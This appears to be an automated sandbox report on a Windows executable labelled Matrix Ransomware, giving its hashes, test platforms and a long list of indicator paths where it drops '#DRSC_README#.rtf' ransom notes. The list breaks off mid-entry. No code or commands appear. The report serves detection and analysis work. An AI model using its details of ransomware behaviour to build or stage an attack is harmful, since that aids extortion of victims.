Analysis
-
max time kernel
90s -
max time network
91s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe
-
Size
1.2MB
-
MD5
67fec6ab8e3a8b74aa742f8b365cdbca
-
SHA1
e36e647e055aeeb94a3f1e3e16fb6968c30d73ec
-
SHA256
710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb
-
SHA512
5dcae0d0181ad4684a9c4d88f1b93948c1b42d9ed4cf5ed7ee86052b57d2fa38b4a3024d837f758dc4b63a49e66fd64135bc58bb839cb00db648494fed749ffe
Malware Config
Signatures
-
Matrix Ransomware 459 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\Links\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Videos\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\datareporting\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\Microsoft Websites\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\datareporting\archived\2020-07\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Downloads\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Searches\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Videos\Sample Videos\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Favorites\MSN Websites\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Saved Games\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\startupCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Music\Sample Music\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Music\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\cache2\entries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Public\Music\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#DRSC_README#.rtf 